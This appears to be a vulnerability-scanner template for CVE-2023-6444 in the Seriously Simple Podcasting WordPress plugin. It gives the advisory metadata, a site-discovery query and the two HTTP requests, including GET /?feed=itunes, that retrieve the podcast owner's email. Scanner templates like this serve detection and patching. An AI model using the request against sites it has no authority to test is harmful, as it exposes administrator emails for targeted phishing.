id: CVE-2023-6444 info: name: Seriously Simple Podcasting < 3.0.0 - Information Disclosure author: s4e-io severity: medium description: | The Seriously Simple Podcasting WordPress plugin before 3.0.0 discloses the Podcast owner's email address (which by default is the admin email address) via an unauthenticated crafted request. impact: | Unauthenticated attackers can send crafted requests to obtain podcast owner email addresses which typically reveal administrator email addresses, enabling targeted phishing attacks. remediation: Fixed in 3.0.0 reference: - https://wpscan.com/vulnerability/061c59d6-f4a0-4cd1-b945-5e92b9c2b4aa/ - https://github.com/Wayne-Ker/CVE-2023-6444-POC/blob/main/cve-2023-6444.py - https://nvd.nist.gov/vuln/detail/CVE-2023-6444 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2023-6444 epss-score: 0.61362 epss-percentile: 0.98346 cpe: cpe:2.3:a:seriously_simple_podcasting_plugin:seriously_simple_podcasting_plugin:2:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: castos product: seriously-simple-podcasting framework: wordpress publicwww-query: "/wp-content/plugins/seriously-simple-podcasting/" tags: cve,cve2023,wordpress,wp-plugin,exposure,wp,seriously-simple-podcasting,vuln flow: http(1) && http(2) http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - 'contains(body,"/wp-content/plugins/seriously-simple-podcasting")' - "status_code == 200" condition: and internal: true - raw: - | GET /?feed=itunes HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - 'contains_all(body,"","")' - 'contains(content_type,"text/xml")' - "status_code == 200" condition: and # digest: 4a0a0047304502200d68a64545d94a6da240b5ff5ca56abaa01cfdaefb005e5da2d3436bcbcab03c022100cc8e0860c835917eae50679498edda44ed6000dbbcbadc4aa7cf46e6109eb48b:922c64590222798bb761d5b6d8e72950